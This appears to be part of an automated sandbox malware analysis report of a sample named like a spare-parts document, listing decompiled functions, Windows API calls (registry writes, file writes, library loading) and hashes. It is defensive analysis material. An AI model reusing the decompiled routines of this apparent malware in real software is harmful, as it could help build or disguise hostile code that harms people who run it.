                                                                0x02525d49
                                                                0x02525d4c
                                                                0x02525d4f
                                                                0x02525d5c
                                                                0x02525d69

                                                                APIs
                                                                • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 02525D0B
                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000000,02525D6A), ref: 02525D39
                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,?,00000000,02525D6A), ref: 02525D42
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenValue
                                                                • String ID:
                                                                • API String ID: 779948276-0
                                                                • Opcode ID: 591d6ee962721239b2de3f6cb3433d58e524217aa4b675932b9e73c5ddcd8490
                                                                • Instruction ID: 37439c1c2cd4294e413061efcf667eb3c7dcd545bca9ee773ab9cacb5ae4304c
                                                                • Opcode Fuzzy Hash: 591d6ee962721239b2de3f6cb3433d58e524217aa4b675932b9e73c5ddcd8490
                                                                • Instruction Fuzzy Hash: C511DA71A00249BFEB00EBA8C881A9E77FDFB89710F504471F514D7290EB30AA45DE58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02525698 Relevance: 4.5, APIs: 3, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 55%
                                                                			E02525698(char __eax, void* __ebx, char __edx, void* __esi) {
				char _v8;
				char _v12;
				void* _t16;
				char _t17;
				void* _t25;
				intOrPtr _t29;
				void* _t35;

				_v12 = __edx;
				_v8 = __eax;
				E02514D54(_v8);
				E02514D54(_v12);
				_push(_t35);
				_push(0x2525715);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35 + 0xfffffff8;
				_push(0);
				_t16 = E02514D64(_v12);
				_push(_t16); // executed
				L025169F0(); // executed
				_t25 = _t16;
				_t17 = _v8;
				if(_t17 != 0) {
					_t17 =  *((intOrPtr*)(_t17 - 4));
				}
				_push(_t17);
				_push(E02514DBC( &_v8));
				_push(_t25); // executed
				L025169F8(); // executed
				L025169E8();
				_t29 = _t25;
				 *[fs:eax] = _t29;
				_push(E0252571C);
				return E025148C4( &_v12, 2);
			}










                                                                0x025256a0
                                                                0x025256a3
                                                                0x025256a9
                                                                0x025256b1
                                                                0x025256b8
                                                                0x025256b9
                                                                0x025256be
                                                                0x025256c1
                                                                0x025256c4
                                                                0x025256c9
                                                                0x025256ce
                                                                0x025256cf
                                                                0x025256d4
                                                                0x025256d6
                                                                0x025256db
                                                                0x025256e0
                                                                0x025256e0
                                                                0x025256e4
                                                                0x025256ed
                                                                0x025256ee
                                                                0x025256ef
                                                                0x025256f5
                                                                0x025256fc
                                                                0x025256ff
                                                                0x02525702
                                                                0x02525714

                                                                APIs
                                                                • _lcreat.KERNEL32(00000000,00000000), ref: 025256CF
                                                                • _lwrite.KERNEL32(00000000,00000000,?,00000000,02525715), ref: 025256EF
                                                                • _lclose.KERNEL32(00000000), ref: 025256F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _lclose_lcreat_lwrite
                                                                • String ID:
                                                                • API String ID: 381991513-0
                                                                • Opcode ID: a1bebb810ca40903b7c03dc6b3bcfda44c30777bcebd148cec6ed444b5ed7d3d
                                                                • Instruction ID: ddb6130a8e295dd39aa111828b2714d3f790e84c3e0258f2dbc07e536c2e1e6b
                                                                • Opcode Fuzzy Hash: a1bebb810ca40903b7c03dc6b3bcfda44c30777bcebd148cec6ed444b5ed7d3d
                                                                • Instruction Fuzzy Hash: 9E014F70600259AFFB14EBB8CC91A9E7BFDFB85710F5105B0E805E7290EB349E00DA58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025133C4 Relevance: 3.1, APIs: 2, Instructions: 61fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E025133C4(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				void** _t47;
				signed int _t48;
				signed int _t58;

				_t58 = _t48;
				_t47 = __eax;
				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
					E02512D48(0x67);
					_v8 = 0;
				} else {
					if(ReadFile( *__eax, __edx, __eax[2] * _t58,  &_v8, 0) != 0) {
						_v8 = _v8 /  *(_t47 + 8);
						if(_a16 == 0) {
							if(_t58 != _v8) {
								E02512D48(_a4);
								_v8 = 0;
							}
						} else {
							 *_a16 = _v8;
						}
					} else {
						E02512D48(GetLastError());
						_v8 = 0;
					}
				}
				return _v8;
			}







                                                                0x025133cb
                                                                0x025133cf
                                                                0x025133dc
                                                                0x0251343d
                                                                0x02513444
                                                                0x025133de
                                                                0x025133f3
                                                                0x02513410
                                                                0x02513418
                                                                0x02513427
                                                                0x0251342c
                                                                0x02513433
                                                                0x02513433
                                                                0x0251341a
                                                                0x02513420
                                                                0x02513420
                                                                0x025133f5
                                                                0x025133fa
                                                                0x02513401
                                                                0x02513401
                                                                0x025133f3
                                                                0x0251344f

                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 025133EE
                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 025133F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFileLastRead
                                                                • String ID:
                                                                • API String ID: 1948546556-0
                                                                • Opcode ID: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                • Instruction ID: 4e4a7eb009dc623a8d805feb8e91bcd9d8627908e10fbe668e223427cf8e0bcc
                                                                • Opcode Fuzzy Hash: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                • Instruction Fuzzy Hash: 37114271704159FFEB40DFA9D985A9EBBF9FF88250B1084A6E808DB200E770DE01DB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025133C2 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 92%
                                                                			E025133C2(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				void** _t48;
				signed int _t50;
				signed int _t64;

				_push(_t50);
				_t64 = _t50;
				_t48 = __eax;
				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
					E02512D48(0x67);
					_v8 = 0;
				} else {
					if(ReadFile( *__eax, __edx, __eax[2] * _t64,  &_v8, 0) != 0) {
						_v8 = _v8 /  *(_t48 + 8);
						if(_a16 == 0) {
							if(_t64 != _v8) {
								E02512D48(_a4);
								_v8 = 0;
							}
						} else {
							 *_a16 = _v8;
						}
					} else {
						E02512D48(GetLastError());
						_v8 = 0;
					}
				}
				return _v8;
			}







                                                                0x025133c7
                                                                0x025133cb
                                                                0x025133cf
                                                                0x025133dc
                                                                0x0251343d
                                                                0x02513444
                                                                0x025133de
                                                                0x025133f3
                                                                0x02513410
                                                                0x02513418
                                                                0x02513427
                                                                0x0251342c
                                                                0x02513433
                                                                0x02513433
                                                                0x0251341a
                                                                0x02513420
                                                                0x02513420
                                                                0x025133f5
                                                                0x025133fa
                                                                0x02513401
                                                                0x02513401
                                                                0x025133f3
                                                                0x0251344f

                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 025133EE
                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 025133F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFileLastRead
                                                                • String ID:
                                                                • API String ID: 1948546556-0
                                                                • Opcode ID: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                • Instruction ID: 5d061a235ec9b4f4d206ca15fbcbb672082cc4f44a85b40da19c17222734a69a
                                                                • Opcode Fuzzy Hash: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                • Instruction Fuzzy Hash: B2F05471704129BFE704DAAADC85FAABBECEF94660B1084A6F908CB100E670DD00C674
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02512FC4 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E02512FC4(intOrPtr __eax, intOrPtr* __edx) {
				char _v276;
				CHAR* _t7;
				long _t9;
				intOrPtr* _t12;
				void* _t13;
				CHAR* _t18;
				intOrPtr _t19;
				void* _t20;

				_t12 = __edx;
				_t19 = __eax;
				E025148A0(__edx);
				_t21 = _t19;
				if(_t19 == 0) {
					_t9 = GetModuleFileNameA(0,  &_v276, 0x105); // executed
					return E02514990(_t12, _t9, _t20, _t21);
				}
				_t18 = GetCommandLineA();
				while(1) {
					_t7 = E02512EC8(_t18, _t13, _t12);
					_t18 = _t7;
					__eflags = _t19;
					if(_t19 == 0) {
						break;
					}
					__eflags =  *_t12;
					if( *_t12 != 0) {
						_t19 = _t19 - 1;
						continue;
					}
					break;
				}
				return _t7;
			}











                                                                0x02512fcd
                                                                0x02512fcf
                                                                0x02512fd3
                                                                0x02512fd8
                                                                0x02512fda
                                                                0x02512fe8
                                                                0x00000000
                                                                0x02512ff3
                                                                0x02512fff
                                                                0x02513001
                                                                0x02513005
                                                                0x0251300a
                                                                0x0251300c
                                                                0x0251300e
                                                                0x00000000
                                                                0x00000000
                                                                0x02513010
                                                                0x02513013
                                                                0x02513015
                                                                0x00000000
                                                                0x02513015
                                                                0x00000000
                                                                0x02513013
                                                                0x02513021

                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000), ref: 02512FE8
                                                                • GetCommandLineA.KERNEL32(?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 02512FFA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CommandFileLineModuleName
                                                                • String ID:
                                                                • API String ID: 2151003578-0
                                                                • Opcode ID: 255ad70dfb8b58ca78ae26882bd6932ebd82c777822cb73abc3a05c11e3e8446
                                                                • Instruction ID: 999c96400483fdcd5ede657db96c4d63bdb10fb9813d60a08d9e798f8fbfd91c
                                                                • Opcode Fuzzy Hash: 255ad70dfb8b58ca78ae26882bd6932ebd82c777822cb73abc3a05c11e3e8446
                                                                • Instruction Fuzzy Hash: 3BF02023F0062233F322A16CCC4077E29C67BC87A1F4501B0A909CB280EA60CE0857DA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251CAAE Relevance: 3.0, APIs: 2, Instructions: 34libraryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 34%
                                                                			E0251CAAE(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t17;
				void* _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _t20;
				_t21 = _t20 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t19);
				_push(0x251cb22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t21;
				asm("fnstcw word [ebp-0x2]");
				_push(_t19);
				_push(0x251cb04);
				_push( *[fs:eax]);
				 *[fs:eax] = _t21;
				_t9 = LoadLibraryA(E02514D64(_t12)); // executed
				_v12 = _t9;
				_pop(_t17);
				 *[fs:eax] = _t17;
				_push(E0251CB0B);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
			}












                                                                0x0251cab1
                                                                0x0251cab3
                                                                0x0251cab7
                                                                0x0251caba
                                                                0x0251cabf
                                                                0x0251cac4
                                                                0x0251cac5
                                                                0x0251caca
                                                                0x0251cacd
                                                                0x0251cad0
                                                                0x0251cad5
                                                                0x0251cad6
                                                                0x0251cadb
                                                                0x0251cade
                                                                0x0251cae9
                                                                0x0251caee
                                                                0x0251caf3
                                                                0x0251caf6
                                                                0x0251caf9
                                                                0x0251cafe
                                                                0x0251cb00

                                                                APIs
                                                                • SetErrorMode.KERNEL32 ref: 0251CABA
                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0251CB04,?,00000000,0251CB22), ref: 0251CAE9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLibraryLoadMode
                                                                • String ID:
                                                                • API String ID: 2987862817-0
                                                                • Opcode ID: 592e1fb937993f14e8f4d33655fe9fe63bd9786b9658b219456f27072c75d9b7
                                                                • Instruction ID: 66df6d8b922355f0307dec2a7991820253199619d3b2a62ca0881bc9c36b1108
                                                                • Opcode Fuzzy Hash: 592e1fb937993f14e8f4d33655fe9fe63bd9786b9658b219456f27072c75d9b7
                                                                • Instruction Fuzzy Hash: 96F05E70614704BFFB115F75CC5182ABBBDF749B1078248B1E801D2A50E5399C20C969
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251CAB0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32 ref: 0251CABA
                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0251CB04,?,00000000,0251CB22), ref: 0251CAE9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLibraryLoadMode
                                                                • String ID:
                                                                • API String ID: 2987862817-0
                                                                • Opcode ID: 7b27f5cfff0af013fa1456ab116b9e32cf10b7861c5a89aa25d1204a9044fe58
                                                                • Instruction ID: 1541649f864b222f47507093930f48486787a1a48396829d838e01dbc318b14e
                                                                • Opcode Fuzzy Hash: 7b27f5cfff0af013fa1456ab116b9e32cf10b7861c5a89aa25d1204a9044fe58
                                                                • Instruction Fuzzy Hash: 8AF08270614704BFFB115F75CC5182BBBBDF74DB1078248B1E801D2A50E5395C20C969
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02515AA8 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E02515AA8(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				CHAR* _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x2510000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E02515D0C(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x2510000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x2510000
				return  *_t7;
			}








                                                                0x02515ab0
                                                                0x02515ab6
                                                                0x02515ac2
                                                                0x02515ac6
                                                                0x02515acf
                                                                0x02515ad4
                                                                0x02515ad6
                                                                0x02515adb
                                                                0x02515add
                                                                0x02515ae0
                                                                0x02515ae0
                                                                0x02515adb
                                                                0x02515ae3
                                                                0x02515aee

                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(02510000,?,00000105), ref: 02515AC6
                                                                  • Part of subcall function 02515D0C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02510000,0252D7B4), ref: 02515D28
                                                                  • Part of subcall function 02515D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02510000,0252D7B4), ref: 02515D46
                                                                  • Part of subcall function 02515D0C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02510000,0252D7B4), ref: 02515D64
                                                                  • Part of subcall function 02515D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02515D82
                                                                  • Part of subcall function 02515D0C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02515E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02515DCB
                                                                  • Part of subcall function 02515D0C: RegQueryValueExA.ADVAPI32(?,02515F78,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02515E11,?,80000001), ref: 02515DE9
                                                                  • Part of subcall function 02515D0C: RegCloseKey.ADVAPI32(?,02515E18,00000000,?,?,00000000,02515E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02515E0B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                • String ID:
                                                                • API String ID: 2796650324-0
                                                                • Opcode ID: dd43b2051222977f98b27821c9ce266dd37c7b0da5ec07d15f6394917f749a7b
                                                                • Instruction ID: 3583e229663038dfd794d01d15c64a61eb88ceee92748a97e20ff7529a0e48ed
                                                                • Opcode Fuzzy Hash: dd43b2051222977f98b27821c9ce266dd37c7b0da5ec07d15f6394917f749a7b
                                                                • Instruction Fuzzy Hash: A2E06D71A003148BDB10DE68C8C0B4777D8BB88751F4046A1ED68CF286E3B0DA548BD4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02518094 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 75%
                                                                			E02518094(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                                                0x02518097
                                                                0x025180a8
                                                                0x025180af
                                                                0x025180b1
                                                                0x025180b1
                                                                0x025180bf

                                                                APIs
                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 025180A8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 9c3475107fb88e5b2fa032e5a56ae23c9ad0c42c3cf7dd9a7fd297a6f3fe9822
                                                                • Instruction ID: c0108f66de257adb0cd6c8b75f17f0fff188e95b4409fb10f26979ac7c329766
                                                                • Opcode Fuzzy Hash: 9c3475107fb88e5b2fa032e5a56ae23c9ad0c42c3cf7dd9a7fd297a6f3fe9822
                                                                • Instruction Fuzzy Hash: 11D05B763081107BF224955A9D84EBB5BDCDBC5771F11073EB558C7180D7208C05C775
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02518110 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E02518110(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E02514D64(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                0x0251811b
                                                                0x02518123
                                                                0x0251812c
                                                                0x0251812d
                                                                0x02518130
                                                                0x02518130

                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(00000000,?,02526AA4,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 0251811B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: dfca8978c64b0109df38ab73870e2ac4f30813a10a7ed2dbb36e873bedf43611
                                                                • Instruction ID: d470ac402bf9a241a187e79781526990672adad856a7bf576b168203fc713459
                                                                • Opcode Fuzzy Hash: dfca8978c64b0109df38ab73870e2ac4f30813a10a7ed2dbb36e873bedf43611
                                                                • Instruction Fuzzy Hash: DBC08CE2251302063F3061BC8CC846906CB69852783742F21E038C21E1D32580276828
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02518134 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E02518134(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E02514D64(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                0x0251813f
                                                                0x02518147
                                                                0x02518150
                                                                0x02518151
                                                                0x02518154
                                                                0x02518154

                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(00000000,?,0252752B,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,ScanString,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession), ref: 0251813F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 47eef7dea7b5b155feaf10c48f60e3716a611a16a1abc2819adb8f8fe0eeec34
                                                                • Instruction ID: 260e0c1a8e36069e965c2ec5c22afc0006dc5527b3573d459b196fbfbb6e869a
                                                                • Opcode Fuzzy Hash: 47eef7dea7b5b155feaf10c48f60e3716a611a16a1abc2819adb8f8fe0eeec34
                                                                • Instruction Fuzzy Hash: CBC08CA23517010A3F30A1BC8CC854907CD69862383602F21E038C22D1D311D41A2818
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0252B0CC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0252B0CC(int __eax) {
				int _t3;

				_t3 = timeSetEvent(__eax, 0, E0252B0C0, 0, 1); // executed
				 *0x256da78 = _t3;
				return _t3;
			}




                                                                0x0252b0dc
                                                                0x0252b0e1
                                                                0x0252b0e7

                                                                APIs
                                                                • timeSetEvent.WINMM(00002710,00000000,0252B0C0,00000000,00000001), ref: 0252B0DC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Eventtime
                                                                • String ID:
                                                                • API String ID: 2982266575-0
                                                                • Opcode ID: 0806f2ca3ff87eb6db65e86e6a043bdadb5aa602284e923aeeffabd1346711d7
                                                                • Instruction ID: f22c1d26ff31575e64fc8638244eaefdb45eb6b9c2ba381e25119a540c5b70c6
                                                                • Opcode Fuzzy Hash: 0806f2ca3ff87eb6db65e86e6a043bdadb5aa602284e923aeeffabd1346711d7
                                                                • Instruction Fuzzy Hash: 33C092F17C93003AF6209AB85CC2F7322DEF744B01F200812B600EF2C1E2E35894566C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251CB0B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 50%
                                                                			E0251CB0B() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(E0251CB29);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}






                                                                0x0251cb0d
                                                                0x0251cb10
                                                                0x0251cb13
                                                                0x0251cb1c
                                                                0x0251cb21

                                                                APIs
                                                                • SetErrorMode.KERNEL32(?,0251CB29), ref: 0251CB1C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
